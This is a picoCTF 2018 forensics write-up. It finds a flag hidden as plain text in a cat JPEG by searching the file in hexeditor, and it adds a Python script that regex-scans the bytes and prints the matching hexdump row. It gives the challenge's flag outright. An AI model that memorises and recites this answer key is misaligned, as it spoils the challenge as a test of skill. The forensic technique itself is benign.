
PicoCTF2018 - Forensics - hex editor


Objective:

This cat [1]  has a secret to teach you. You can also find the file in /problems/hex-editor_3_086632ac634f394afd301fb6a8dbadc6 on the shell server.


Solution:

So from the objective it looks like our flag will be in the hex of the picture.

I downloaded the picture and opened it with hexeditor

@kali:/home$ hexeditor /home/***********/Downloads/hex_editor.jpg

Since we know what the flag starts with, I used W to search for pico; I chose search for text string


File: /home/*****************/Dow   ASCII Offset: 0x00000000 / 0x00012975 () 
00000000  FF D8 FF E0  00 10 4A 46   49 46 00 01  01 00 00 01   ......JFIF......
00000010  00 01 00 00  FF DB 00 43   00 05 03 04  04 04 03 05   .......C........
00000020  04 04 04 05  05 05 06 07   0C 08 07 07  07 07 0F 0B   ................
00000030  0B 09 0C 11  0F 12 12 11   0F 11 11 13  16 1C 17 13   ................
00000040  14 1A 15 11  11 18 21 18   1A 1D 1D 1F  1F 1F 13 17   ......!.........
00000050  22 24 22 1E  24 1C 1E 1F   1E FF DB 00  43 01 05 05   "$".$.......C...
00000060  05 07 06 07  0E 08 08 0E   1E 14 11 14  1E 1E 1E 1E   ................
00000070  1E 1E 1E 1E  1E 1E 1E 1E   1E 1E 1E 1E  1E 1E 1E 1E   ................
00000080  1E 1E 1E 1E  1E 1E 1E 1E   1E 1E 1E 1E  1E 1E 1E 1E   ................
00000090  1E 1E 1E 1E  1E 1E 1E 1E   1E 1E 1E 1E  1E 1E FF C0   ................
000000A0  00 11 08 04  00 02 77 03   01 22 00 02  11 01 03 11   ......w.."......
000000B0  01 FF C4 00  1F 00 00 01   05 01 01 01  01 01 01 00   ................
000000C0  00 00 00 00  00 00 00 01   02 03 04 05  06 07 08 09   ................
000000D0  0A 0B FF C4  00 B5 10 00   02 01 03 03  02 04 03 05   ................
000000E0  05 04 04 00  00 01 7D 01   02 03 00 04  11 05 12 21   ......}........!
000000F0  31 41 06 13  51 61 07 22   71 14 32 81  91 A1 08 23   1A..Qa."q.2....#
00000100  42 B1 C1 15  52 D1 F0 24   33 62 72 82  09 0A 16 17   B...R..$3br.....
00000110  18 19 1A 25  26 27 28 29   2A 34 35 36  37 38 39 3A   ...%&'()*456789:
00000120  43 44 45 46  47 48 49 4A   53 54 55 56  57 58 59 5A   CDEFGHIJSTUVWXYZ
00000130  63 64 65 66  67 68 69 6A   73 74 75 76  77 78 79 7A   cdefghijstuvwxyz
00000140  83 84 85 86  87 88 89 8A   92 93 94 95  96 97 98 99   ................
00000150  9A A2 A3 A4  A5 A6 A7 A8   A9 AA B2 B3  B4 B5 B6 B7   ................
^G Help   ^C Exit (No Save)   ^T goTo Offset   ^X Exit and Save   ^W Search


00012940  3A 20 22 70  69 63 6F 43   54 46 7B 61  6E 64 5F 74   : "picoCTF{and_t
00012950  68 61 74 73  5F 68 6F 77   5F 75 5F 65  64 69 74 5F   hats_how_u_edit_
00012960  68 65 78 5F  6B 69 74 74   6F 73 5F 38  42 63 41 36   hex_kittos_8BcA6
00012970  37 61 32 7D  22 0A                                    7a2}".






picoCTF{and_thats_how_u_edit_hex_kittos_8BcA67a2}
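The same search done programmatically, as an added example that is not part of the original post: it scans the raw bytes for a picoCTF{...} run, reports the offset, and renders the matching row in hexeditor's layout. The sample bytes are constructed from the header and flag rows shown above with filler in between, so the offset differs from the real file; the function names are my own.

```python
import re
import sys

# Flag shape seen on the page: picoCTF{...} with a printable-ASCII body.
FLAG_RE = re.compile(rb"picoCTF\{[\x21-\x7c\x7e]+\}")

def find_flags(data: bytes):
    """Return (offset, flag) for every flag-shaped ASCII run in data."""
    return [(m.start(), m.group().decode("ascii")) for m in FLAG_RE.finditer(data)]

def hexdump_row(data: bytes, offset: int) -> str:
    """Render the 16-byte row containing `offset` the way hexeditor lays it out."""
    base = offset & ~0xF
    row = data[base:base + 16]
    # Four groups of four bytes; a short final row is padded to keep columns aligned.
    g = [" ".join(f"{b:02X}" for b in row[i:i + 4]).ljust(11) for i in range(0, 16, 4)]
    text = "".join(chr(b) if 0x20 <= b <= 0x7E else "." for b in row)
    return f"{base:08X}  {g[0]}  {g[1]}   {g[2]}  {g[3]}   {text}"

# Constructed sample: the JFIF header row from the dump above, 48 filler bytes,
# then the trailing text from the last rows of the dump.
SAMPLE = (
    bytes.fromhex("FFD8FFE000104A464946000101000001")
    + b"\x1e" * 48
    + b': "picoCTF{and_thats_how_u_edit_hex_kittos_8BcA67a2}"\n'
)

def scan(data: bytes):
    """Return one (offset, flag, hexdump row) tuple per hit."""
    return [(off, flag, hexdump_row(data, off)) for off, flag in find_flags(data)]

if __name__ == "__main__":
    # With a path argument, scan that file; otherwise scan the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = SAMPLE
    for off, flag, row in scan(blob):
        print(f"0x{off:08X}  {flag}")
        print(row)
```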
